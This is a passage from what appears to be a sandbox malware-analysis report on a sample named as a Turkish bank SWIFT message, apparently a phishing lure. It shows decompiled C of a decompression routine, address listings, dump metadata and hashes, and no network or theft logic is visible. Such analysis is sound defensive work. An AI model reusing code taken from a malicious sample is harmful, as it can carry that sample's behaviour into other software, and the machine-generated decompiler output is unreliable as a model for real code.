                                  										_t374 =  &_v76;
                                  										 *_t374 = _v76 + 1;
                                  										__eflags =  *_t374;
                                  										goto L115;
                                  									} else {
                                  										goto L112;
                                  									}
                                  								}
                                  								__ecx = _v16;
                                  								__ebx = __ebx + __ebx;
                                  								_v20 = _v20 >> 1;
                                  								__eflags = _v16 - _v20;
                                  								_v72 = __ebx;
                                  								if(_v16 >= _v20) {
                                  									__ecx = _v20;
                                  									_v16 = _v16 - _v20;
                                  									__ebx = __ebx | 0x00000001;
                                  									__eflags = __ebx;
                                  									_v72 = __ebx;
                                  								}
                                  								__eflags = _v20 - 0x1000000;
                                  								if(_v20 >= 0x1000000) {
                                  									L104:
                                  									_t344 =  &_v76;
                                  									 *_t344 = _v76 - 1;
                                  									__eflags =  *_t344;
                                  									goto L105;
                                  								} else {
                                  									goto L102;
                                  								}
                                  							}
                                  							__edx = _v8;
                                  							__eax = __eax - __ebx;
                                  							_v68 = __ecx;
                                  							__eax = _v8 + 0x55e + __eax * 2;
                                  							goto L111;
                                  						case 0x1a:
                                  							L58:
                                  							__eflags = _v104;
                                  							if(_v104 == 0) {
                                  								_v140 = 0x1a;
                                  								goto L173;
                                  							}
                                  							__ecx = _v108;
                                  							__al = _v96;
                                  							__edx = _v12;
                                  							_v100 = _v100 + 1;
                                  							_v108 = _v108 + 1;
                                  							_v104 = _v104 - 1;
                                  							 *_v108 = __al;
                                  							__ecx = _v24;
                                  							 *(_v12 + __ecx) = __al;
                                  							__eax = __ecx + 1;
                                  							__edx = 0;
                                  							_t197 = __eax % _v120;
                                  							__eax = __eax / _v120;
                                  							__edx = _t197;
                                  							goto L82;
                                  						case 0x1b:
                                  							L78:
                                  							__eflags = _v104;
                                  							if(_v104 == 0) {
                                  								_v140 = 0x1b;
                                  								goto L173;
                                  							}
                                  							__eax = _v24;
                                  							__eax = _v24 - _v48;
                                  							__eflags = __eax - _v120;
                                  							if(__eax >= _v120) {
                                  								__eax = __eax + _v120;
                                  								__eflags = __eax;
                                  							}
                                  							__edx = _v12;
                                  							__cl =  *(__edx + __eax);
                                  							__eax = _v24;
                                  							_v96 = __cl;
                                  							 *(__edx + __eax) = __cl;
                                  							__eax = __eax + 1;
                                  							__edx = 0;
                                  							_t280 = __eax % _v120;
                                  							__eax = __eax / _v120;
                                  							__edx = _t280;
                                  							__eax = _v108;
                                  							_v100 = _v100 + 1;
                                  							_v108 = _v108 + 1;
                                  							_t289 =  &_v104;
                                  							 *_t289 = _v104 - 1;
                                  							__eflags =  *_t289;
                                  							 *_v108 = __cl;
                                  							L82:
                                  							_v24 = __edx;
                                  							goto L83;
                                  						case 0x1c:
                                  							while(1) {
                                  								L126:
                                  								__eflags = _v104;
                                  								if(_v104 == 0) {
                                  									break;
                                  								}
                                  								__eax = _v24;
                                  								__eax = _v24 - _v48;
                                  								__eflags = __eax - _v120;
                                  								if(__eax >= _v120) {
                                  									__eax = __eax + _v120;
                                  									__eflags = __eax;
                                  								}
                                  								__edx = _v12;
                                  								__cl =  *(__edx + __eax);
                                  								__eax = _v24;
                                  								_v96 = __cl;
                                  								 *(__edx + __eax) = __cl;
                                  								__eax = __eax + 1;
                                  								__edx = 0;
                                  								_t420 = __eax % _v120;
                                  								__eax = __eax / _v120;
                                  								__edx = _t420;
                                  								__eax = _v108;
                                  								_v108 = _v108 + 1;
                                  								_v104 = _v104 - 1;
                                  								_v52 = _v52 - 1;
                                  								__eflags = _v52;
                                  								 *_v108 = __cl;
                                  								_v24 = _t420;
                                  								if(_v52 > 0) {
                                  									continue;
                                  								} else {
                                  									L83:
                                  									_v140 = 2;
                                  									goto L3;
                                  								}
                                  							}
                                  							_v140 = 0x1c;
                                  							L173:
                                  							_push(0x22);
                                  							_pop(_t574);
                                  							memcpy(_v148,  &_v140, _t574 << 2);
                                  							return 0;
                                  					}
                                  				}
                                  				L174:
                                  				_t538 = _t537 | 0xffffffff;
                                  				return _t538;
                                  			}










































                                  0x00405ead
                                  0x00405eb4
                                  0x00405eba
                                  0x00405ec0
                                  0x00000000
                                  0x00405ec4
                                  0x00405ed0
                                  0x00405ed0
                                  0x00405ed0
                                  0x00405ed9
                                  0x00000000
                                  0x00000000
                                  0x00405edf
                                  0x00000000
                                  0x00405ee6
                                  0x00405eea
                                  0x00000000
                                  0x00000000
                                  0x00405ef3
                                  0x00405ef6
                                  0x00405ef9
                                  0x00405efb
                                  0x00405efd
                                  0x00000000
                                  0x00000000
                                  0x00405f03
                                  0x00405f06
                                  0x00405f08
                                  0x00405f09
                                  0x00405f0c
                                  0x00405f0e
                                  0x00405f0f
                                  0x00405f11
                                  0x00405f14
                                  0x00405f19
                                  0x00405f1e
                                  0x00405f27
                                  0x00405f3a
                                  0x00405f3d
                                  0x00405f46
                                  0x00405f49
                                  0x00405f71
                                  0x00405f71
                                  0x00405f73
                                  0x00405f81
                                  0x00405f81
                                  0x00405f85
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405f75
                                  0x00405f75
                                  0x00405f78
                                  0x00405f78
                                  0x00405f79
                                  0x00405f79
                                  0x00000000
                                  0x00405f75
                                  0x00405f4b
                                  0x00405f4f
                                  0x00405f54
                                  0x00405f54
                                  0x00405f5d
                                  0x00405f63
                                  0x00405f65
                                  0x00405f68
                                  0x00000000
                                  0x00405f6e
                                  0x00405f6e
                                  0x00000000
                                  0x00405f6e
                                  0x00000000
                                  0x00405f8b
                                  0x00405f8b
                                  0x00405f8f
                                  0x0040683b
                                  0x00000000
                                  0x0040683b
                                  0x00405f98
                                  0x00405fa8
                                  0x00405fab
                                  0x00405fae
                                  0x00405fae
                                  0x00405fae
                                  0x00405fb1
                                  0x00405fb1
                                  0x00405fb5
                                  0x00000000
                                  0x00000000
                                  0x00405fb7
                                  0x00405fba
                                  0x00405fbd
                                  0x00405fe7
                                  0x00405fed
                                  0x00405ff4
                                  0x00000000
                                  0x00405ff4
                                  0x00405fbf
                                  0x00405fc3
                                  0x00405fc6
                                  0x00405fcb
                                  0x00405fcb
                                  0x00405fd6
                                  0x00405fdc
                                  0x00405fde
                                  0x00405fe1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406026
                                  0x0040602c
                                  0x0040602f
                                  0x0040603c
                                  0x00406044
                                  0x00000000
                                  0x00000000
                                  0x00405ffb
                                  0x00405ffb
                                  0x00405fff
                                  0x0040684a
                                  0x00000000
                                  0x0040684a
                                  0x0040600b
                                  0x00406016
                                  0x00406016
                                  0x00406016
                                  0x00406019
                                  0x0040601c
                                  0x0040601f
                                  0x00406022
                                  0x00406024
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004066bb
                                  0x004066bb
                                  0x004066c1
                                  0x004066c7
                                  0x004066ca
                                  0x004066cd
                                  0x004066e7
                                  0x004066ea
                                  0x004066f0
                                  0x004066fb
                                  0x004066fb
                                  0x004066fd
                                  0x004066cf
                                  0x004066cf
                                  0x004066de
                                  0x004066e2
                                  0x004066e2
                                  0x00406700
                                  0x00406707
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406709
                                  0x00406709
                                  0x0040670d
                                  0x004068bc
                                  0x00000000
                                  0x004068bc
                                  0x00406719
                                  0x00406720
                                  0x00406728
                                  0x00406728
                                  0x00406728
                                  0x0040672b
                                  0x0040672e
                                  0x0040672e
                                  0x00000000
                                  0x00000000
                                  0x0040604c
                                  0x0040604e
                                  0x00406051
                                  0x004060c2
                                  0x004060c5
                                  0x004060c8
                                  0x004060cf
                                  0x004060d9
                                  0x00000000
                                  0x004060d9
                                  0x00406053
                                  0x00406057
                                  0x0040605a
                                  0x0040605c
                                  0x0040605f
                                  0x00406062
                                  0x00406064
                                  0x00406067
                                  0x00406069
                                  0x0040606e
                                  0x00406071
                                  0x00406074
                                  0x00406078
                                  0x0040607f
                                  0x00406082
                                  0x00406089
                                  0x0040608d
                                  0x00406095
                                  0x00406095
                                  0x00406095
                                  0x0040608f
                                  0x0040608f
                                  0x0040608f
                                  0x00406084
                                  0x00406084
                                  0x00406084
                                  0x00406099
                                  0x0040609c
                                  0x004060ba
                                  0x004060bc
                                  0x00000000
                                  0x004060bc
                                  0x0040609e
                                  0x004060a1
                                  0x004060a4
                                  0x004060a7
                                  0x004060a9
                                  0x004060a9
                                  0x004060a9
                                  0x004060ac
                                  0x004060af
                                  0x004060b1
                                  0x004060b2
                                  0x004060b5
                                  0x00000000
                                  0x00000000
                                  0x004062eb
                                  0x004062ef
                                  0x0040630d
                                  0x00406310
                                  0x00406317
                                  0x0040631a
                                  0x0040631d
                                  0x00406320
                                  0x00406323
                                  0x00406326
                                  0x00406328
                                  0x0040632f
                                  0x00406330
                                  0x00406332
                                  0x00406335
                                  0x00406338
                                  0x0040633b
                                  0x0040633b
                                  0x00406340
                                  0x00000000
                                  0x00406340
                                  0x004062f1
                                  0x004062f4
                                  0x004062f7
                                  0x00406301
                                  0x00000000
                                  0x00000000
                                  0x00406355
                                  0x00406359
                                  0x0040637c
                                  0x0040637f
                                  0x00406382
                                  0x0040638c
                                  0x0040635b
                                  0x0040635b
                                  0x0040635e
                                  0x00406361
                                  0x00406364
                                  0x00406371
                                  0x00406374
                                  0x00406374
                                  0x00000000
                                  0x00000000
                                  0x00406398
                                  0x0040639c
                                  0x00000000
                                  0x00000000
                                  0x004063a2
                                  0x004063a6
                                  0x00000000
                                  0x00000000
                                  0x004063ac
                                  0x004063ae
                                  0x004063b2
                                  0x004063b2
                                  0x004063b5
                                  0x004063b9
                                  0x00000000
                                  0x00000000
                                  0x00406409
                                  0x0040640d
                                  0x00406414
                                  0x00406417
                                  0x0040641a
                                  0x00406424
                                  0x00000000
                                  0x00406424
                                  0x0040640f
                                  0x00000000
                                  0x00000000
                                  0x00406430
                                  0x00406434
                                  0x0040643b
                                  0x0040643e
                                  0x00406441
                                  0x00406436
                                  0x00406436
                                  0x00406436
                                  0x00406444
                                  0x00406447
                                  0x0040644a
                                  0x0040644a
                                  0x0040644d
                                  0x00406450
                                  0x00406453
                                  0x00406453
                                  0x00406456
                                  0x0040645d
                                  0x00406462
                                  0x00000000
                                  0x00000000
                                  0x004064f0
                                  0x004064f0
                                  0x004064f4
                                  0x00406892
                                  0x00000000
                                  0x00406892
                                  0x004064fa
                                  0x004064fd
                                  0x00406500
                                  0x00406504
                                  0x00406507
                                  0x0040650d
                                  0x0040650f
                                  0x0040650f
                                  0x0040650f
                                  0x00406512
                                  0x00406515
                                  0x00000000
                                  0x00000000
                                  0x004060e5
                                  0x004060e5
                                  0x004060e9
                                  0x00406856
                                  0x00000000
                                  0x00406856
                                  0x004060ef
                                  0x004060f2
                                  0x004060f5
                                  0x004060f9
                                  0x004060fc
                                  0x00406102
                                  0x00406104
                                  0x00406104
                                  0x00406104
                                  0x00406107
                                  0x0040610a
                                  0x0040610a
                                  0x0040610d
                                  0x00406110
                                  0x00000000
                                  0x00000000
                                  0x00406116
                                  0x0040611c
                                  0x00000000
                                  0x00000000
                                  0x00406122
                                  0x00406122
                                  0x00406126
                                  0x00406129
                                  0x0040612c
                                  0x0040612f
                                  0x00406132
                                  0x00406133
                                  0x00406136
                                  0x00406138
                                  0x0040613e
                                  0x00406141
                                  0x00406144
                                  0x00406147
                                  0x0040614a
                                  0x0040614d
                                  0x00406150
                                  0x0040616c
                                  0x0040616f
                                  0x00406172
                                  0x00406175
                                  0x0040617c
                                  0x00406180
                                  0x00406182
                                  0x00406186
                                  0x00406152
                                  0x00406152
                                  0x00406156
                                  0x0040615e
                                  0x00406163
                                  0x00406165
                                  0x00406167
                                  0x00406167
                                  0x00406189
                                  0x00406190
                                  0x00406193
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x0040619e
                                  0x0040619e
                                  0x004061a2
                                  0x00406862
                                  0x00000000
                                  0x00406862
                                  0x004061a8
                                  0x004061ab
                                  0x004061ae
                                  0x004061b2
                                  0x004061b5
                                  0x004061bb
                                  0x004061bd
                                  0x004061bd
                                  0x004061bd
                                  0x004061c0
                                  0x004061c3
                                  0x004061c3
                                  0x004061c3
                                  0x004061c9
                                  0x00000000
                                  0x00000000
                                  0x004061cb
                                  0x004061ce
                                  0x004061d1
                                  0x004061d4
                                  0x004061d7
                                  0x004061da
                                  0x004061dd
                                  0x004061e0
                                  0x004061e3
                                  0x004061e6
                                  0x004061e9
                                  0x00406201
                                  0x00406204
                                  0x00406207
                                  0x0040620a
                                  0x0040620a
                                  0x0040620d
                                  0x00406211
                                  0x00406213
                                  0x004061eb
                                  0x004061eb
                                  0x004061f3
                                  0x004061f8
                                  0x004061fa
                                  0x004061fc
                                  0x004061fc
                                  0x00406216
                                  0x0040621d
                                  0x00406220
                                  0x00000000
                                  0x00406222
                                  0x00000000
                                  0x00406222
                                  0x00406220
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00000000
                                  0x00000000
                                  0x00406262
                                  0x00406262
                                  0x00406266
                                  0x0040686e
                                  0x00000000
                                  0x0040686e
                                  0x0040626c
                                  0x0040626f
                                  0x00406272
                                  0x00406276
                                  0x00406279
                                  0x0040627f
                                  0x00406281
                                  0x00406281
                                  0x00406281
                                  0x00406284
                                  0x00406287
                                  0x00406287
                                  0x0040628d
                                  0x0040622b
                                  0x0040622b
                                  0x0040622e
                                  0x00000000
                                  0x0040622e
                                  0x0040628f
                                  0x0040628f
                                  0x00406292
                                  0x00406295
                                  0x00406298
                                  0x0040629b
                                  0x0040629e
                                  0x004062a1
                                  0x004062a4
                                  0x004062a7
                                  0x004062aa
                                  0x004062ad
                                  0x004062c5
                                  0x004062c8
                                  0x004062cb
                                  0x004062ce
                                  0x004062ce
                                  0x004062d1
                                  0x004062d5
                                  0x004062d7
                                  0x004062af
                                  0x004062af
                                  0x004062b7
                                  0x004062bc
                                  0x004062be
                                  0x004062c0
                                  0x004062c0
                                  0x004062da
                                  0x004062e1
                                  0x004062e4
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x00406573
                                  0x00406573
                                  0x00406577
                                  0x0040689e
                                  0x00000000
                                  0x0040689e
                                  0x0040657d
                                  0x00406580
                                  0x00406583
                                  0x00406587
                                  0x0040658a
                                  0x00406590
                                  0x00406592
                                  0x00406592
                                  0x00406592
                                  0x00406595
                                  0x00000000
                                  0x00000000
                                  0x00406343
                                  0x00406343
                                  0x00406346
                                  0x00000000
                                  0x00000000
                                  0x00406682
                                  0x00406686
                                  0x004066a8
                                  0x004066ab
                                  0x004066b5
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x00406688
                                  0x0040668b
                                  0x0040668f
                                  0x00406692
                                  0x00406692
                                  0x00406695
                                  0x00000000
                                  0x00000000
                                  0x0040673f
                                  0x00406743
                                  0x00406761
                                  0x00406761
                                  0x00406761
                                  0x00406768
                                  0x0040676f
                                  0x00406776
                                  0x00406776
                                  0x00000000
                                  0x00406776
                                  0x00406745
                                  0x00406748
                                  0x0040674b
                                  0x0040674e
                                  0x00406755
                                  0x00406699
                                  0x00406699
                                  0x0040669c
                                  0x00000000
                                  0x00000000
                                  0x00406830
                                  0x00406833
                                  0x00000000
                                  0x00000000
                                  0x0040646a
                                  0x0040646c
                                  0x00406473
                                  0x00406474
                                  0x00406476
                                  0x00406479
                                  0x00000000
                                  0x00000000
                                  0x00406481
                                  0x00406484
                                  0x00406487
                                  0x00406489
                                  0x0040648b
                                  0x0040648b
                                  0x0040648c
                                  0x0040648f
                                  0x00406496
                                  0x00406499
                                  0x004064a7
                                  0x00000000
                                  0x00000000
                                  0x0040677d
                                  0x0040677d
                                  0x00406780
                                  0x00406787
                                  0x00000000
                                  0x00000000
                                  0x0040678c
                                  0x0040678c
                                  0x00406790
                                  0x004068c8
                                  0x00000000
                                  0x004068c8
                                  0x00406796
                                  0x00406799
                                  0x0040679c
                                  0x004067a0
                                  0x004067a3
                                  0x004067a9
                                  0x004067ab
                                  0x004067ab
                                  0x004067ab
                                  0x004067ae
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b4
                                  0x004067b4
                                  0x004067b8
                                  0x00406818
                                  0x0040681b
                                  0x00406820
                                  0x00406821
                                  0x00406823
                                  0x00406825
                                  0x00406828
                                  0x00406734
                                  0x00406734
                                  0x00000000
                                  0x00406734
                                  0x004067ba
                                  0x004067c0
                                  0x004067c3
                                  0x004067c6
                                  0x004067c9
                                  0x004067cc
                                  0x004067cf
                                  0x004067d2
                                  0x004067d5
                                  0x004067d8
                                  0x004067db
                                  0x004067f4
                                  0x004067f7
                                  0x004067fa
                                  0x004067fd
                                  0x00406801
                                  0x00406803
                                  0x00406803
                                  0x00406804
                                  0x00406807
                                  0x004067dd
                                  0x004067dd
                                  0x004067e5
                                  0x004067ea
                                  0x004067ec
                                  0x004067ef
                                  0x004067ef
                                  0x0040680a
                                  0x00406811
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x004064af
                                  0x004064b2
                                  0x004064e8
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x0040661b
                                  0x0040661b
                                  0x0040661e
                                  0x00406620
                                  0x004068aa
                                  0x00000000
                                  0x004068aa
                                  0x00406626
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x0040662f
                                  0x00406633
                                  0x00406636
                                  0x00406636
                                  0x00406636
                                  0x00000000
                                  0x00406636
                                  0x004064b4
                                  0x004064b6
                                  0x004064b8
                                  0x004064ba
                                  0x004064bd
                                  0x004064be
                                  0x004064c0
                                  0x004064c2
                                  0x004064c5
                                  0x004064c8
                                  0x004064de
                                  0x004064e3
                                  0x0040651b
                                  0x0040651b
                                  0x0040651f
                                  0x0040654b
                                  0x0040654d
                                  0x00406554
                                  0x00406557
                                  0x0040655a
                                  0x0040655a
                                  0x0040655f
                                  0x0040655f
                                  0x00406561
                                  0x00406564
                                  0x0040656b
                                  0x0040656e
                                  0x0040659b
                                  0x0040659b
                                  0x0040659e
                                  0x004065a1
                                  0x00406615
                                  0x00406615
                                  0x00406615
                                  0x00000000
                                  0x00406615
                                  0x004065a3
                                  0x004065a9
                                  0x004065ac
                                  0x004065af
                                  0x004065b2
                                  0x004065b5
                                  0x004065b8
                                  0x004065bb
                                  0x004065be
                                  0x004065c1
                                  0x004065c4
                                  0x004065dd
                                  0x004065df
                                  0x004065e2
                                  0x004065e3
                                  0x004065e6
                                  0x004065e8
                                  0x004065eb
                                  0x004065ed
                                  0x004065ef
                                  0x004065f2
                                  0x004065f4
                                  0x004065f7
                                  0x004065fb
                                  0x004065fd
                                  0x004065fd
                                  0x004065fe
                                  0x00406601
                                  0x00406604
                                  0x004065c6
                                  0x004065c6
                                  0x004065ce
                                  0x004065d3
                                  0x004065d5
                                  0x004065d8
                                  0x004065d8
                                  0x00406607
                                  0x0040660e
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00000000
                                  0x00406610
                                  0x00000000
                                  0x00406610
                                  0x0040660e
                                  0x00406521
                                  0x00406524
                                  0x00406526
                                  0x00406529
                                  0x0040652c
                                  0x0040652f
                                  0x00406531
                                  0x00406534
                                  0x00406537
                                  0x00406537
                                  0x0040653a
                                  0x0040653a
                                  0x0040653d
                                  0x00406544
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00000000
                                  0x00406546
                                  0x00000000
                                  0x00406546
                                  0x00406544
                                  0x004064ca
                                  0x004064cd
                                  0x004064cf
                                  0x004064d2
                                  0x00000000
                                  0x00000000
                                  0x00406231
                                  0x00406231
                                  0x00406235
                                  0x0040687a
                                  0x00000000
                                  0x0040687a
                                  0x0040623b
                                  0x0040623e
                                  0x00406241
                                  0x00406244
                                  0x00406247
                                  0x0040624a
                                  0x0040624d
                                  0x0040624f
                                  0x00406252
                                  0x00406255
                                  0x00406258
                                  0x0040625a
                                  0x0040625a
                                  0x0040625a
                                  0x00000000
                                  0x00000000
                                  0x004063bc
                                  0x004063bc
                                  0x004063c0
                                  0x00406886
                                  0x00000000
                                  0x00406886
                                  0x004063c6
                                  0x004063c9
                                  0x004063cc
                                  0x004063cf
                                  0x004063d1
                                  0x004063d1
                                  0x004063d1
                                  0x004063d4
                                  0x004063d7
                                  0x004063da
                                  0x004063dd
                                  0x004063e0
                                  0x004063e3
                                  0x004063e4
                                  0x004063e6
                                  0x004063e6
                                  0x004063e6
                                  0x004063e9
                                  0x004063ec
                                  0x004063ef
                                  0x004063f2
                                  0x004063f2
                                  0x004063f2
                                  0x004063f5
                                  0x004063f7
                                  0x004063f7
                                  0x00000000
                                  0x00000000
                                  0x00406639
                                  0x00406639
                                  0x00406639
                                  0x0040663d
                                  0x00000000
                                  0x00000000
                                  0x00406643
                                  0x00406646
                                  0x00406649
                                  0x0040664c
                                  0x0040664e
                                  0x0040664e
                                  0x0040664e
                                  0x00406651
                                  0x00406654
                                  0x00406657
                                  0x0040665a
                                  0x0040665d
                                  0x00406660
                                  0x00406661
                                  0x00406663
                                  0x00406663
                                  0x00406663
                                  0x00406666
                                  0x00406669
                                  0x0040666c
                                  0x0040666f
                                  0x00406672
                                  0x00406676
                                  0x00406678
                                  0x0040667b
                                  0x00000000
                                  0x0040667d
                                  0x004063fa
                                  0x004063fa
                                  0x00000000
                                  0x004063fa
                                  0x0040667b
                                  0x004068b0
                                  0x004068d2
                                  0x004068d8
                                  0x004068da
                                  0x004068e1
                                  0x00000000
                                  0x00000000
                                  0x00405edf
                                  0x004068e7
                                  0x004068e7
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                                  • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                                  • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                                  • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E004062EB() {
                                  				signed int _t539;
                                  				unsigned short _t540;
                                  				signed int _t541;
                                  				void _t542;
                                  				signed int _t543;
                                  				signed int _t544;
                                  				signed int _t573;
                                  				signed int _t576;
                                  				signed int _t597;
                                  				signed int* _t614;
                                  				void* _t621;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t621 - 0x40) != 1) {
                                  						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                  						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                  						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                  						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                  						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                  						_t539 =  *(_t621 - 4) + 0x664;
                                  						 *(_t621 - 0x58) = _t539;
                                  						goto L68;
                                  					} else {
                                  						 *(__ebp - 0x84) = 8;
                                  						while(1) {
                                  							L132:
                                  							 *(_t621 - 0x54) = _t614;
                                  							while(1) {
                                  								L133:
                                  								_t540 =  *_t614;
                                  								_t597 = _t540 & 0x0000ffff;
                                  								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                  								if( *(_t621 - 0xc) >= _t573) {
                                  									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                  									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                  									 *(_t621 - 0x40) = 1;
                                  									_t541 = _t540 - (_t540 >> 5);
                                  									 *_t614 = _t541;
                                  								} else {
                                  									 *(_t621 - 0x10) = _t573;
                                  									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                  									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                  								}
                                  								if( *(_t621 - 0x10) >= 0x1000000) {
                                  									goto L139;
                                  								}
                                  								L137:
                                  								if( *(_t621 - 0x6c) == 0) {
                                  									 *(_t621 - 0x88) = 5;
                                  									L170:
                                  									_t576 = 0x22;
                                  									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                  									_t544 = 0;
                                  									L172:
                                  									return _t544;
                                  								}
                                  								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                  								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                  								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                  								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                  								L139:
                                  								_t542 =  *(_t621 - 0x84);
                                  								while(1) {
                                  									 *(_t621 - 0x88) = _t542;
                                  									while(1) {
                                  										L1:
                                  										_t543 =  *(_t621 - 0x88);
                                  										if(_t543 > 0x1c) {
                                  											break;
                                  										}
                                  										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
                                  											case 0:
                                  												if( *(_t621 - 0x6c) == 0) {
                                  													goto L170;
                                  												}
                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                  												_t543 =  *( *(_t621 - 0x70));
                                  												if(_t543 > 0xe1) {
                                  													goto L171;
                                  												}
                                  												_t547 = _t543 & 0x000000ff;
                                  												_push(0x2d);
                                  												asm("cdq");
                                  												_pop(_t578);
                                  												_push(9);
                                  												_pop(_t579);
                                  												_t617 = _t547 / _t578;
                                  												_t549 = _t547 % _t578 & 0x000000ff;
                                  												asm("cdq");
                                  												_t612 = _t549 % _t579 & 0x000000ff;
                                  												 *(_t621 - 0x3c) = _t612;
                                  												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                  												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                  												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                  												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                  													L10:
                                  													if(_t620 == 0) {
                                  														L12:
                                  														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                  														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                  														goto L15;
                                  													} else {
                                  														goto L11;
                                  													}
                                  													do {
                                  														L11:
                                  														_t620 = _t620 - 1;
                                  														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                  													} while (_t620 != 0);
                                  													goto L12;
                                  												}
                                  												if( *(_t621 - 4) != 0) {
                                  													GlobalFree( *(_t621 - 4));
                                  												}
                                  												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                  												 *(_t621 - 4) = _t543;
                                  												if(_t543 == 0) {
                                  													goto L171;
                                  												} else {
                                  													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                  													goto L10;
                                  												}
                                  											case 1:
                                  												L13:
                                  												__eflags =  *(_t621 - 0x6c);
                                  												if( *(_t621 - 0x6c) == 0) {
                                  													 *(_t621 - 0x88) = 1;
                                  													goto L170;
                                  												}
                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                  												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                  												_t45 = _t621 - 0x48;
                                  												 *_t45 =  *(_t621 - 0x48) + 1;
                                  												__eflags =  *_t45;
                                  												L15:
                                  												if( *(_t621 - 0x48) < 4) {
                                  													goto L13;
                                  												}
                                  												_t555 =  *(_t621 - 0x40);
                                  												if(_t555 ==  *(_t621 - 0x74)) {
                                  													L20:
                                  													 *(_t621 - 0x48) = 5;
                                  													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                  													goto L23;
                                  												}
                                  												 *(_t621 - 0x74) = _t555;
                                  												if( *(_t621 - 8) != 0) {
                                  													GlobalFree( *(_t621 - 8));
                                  												}
                                  												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                  												 *(_t621 - 8) = _t543;
                                  												if(_t543 == 0) {
                                  													goto L171;
                                  												} else {
                                  													goto L20;
                                  												}
                                  											case 2:
                                  												L24:
                                  												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                  												 *(_t621 - 0x84) = 6;
                                  												 *(_t621 - 0x4c) = _t562;
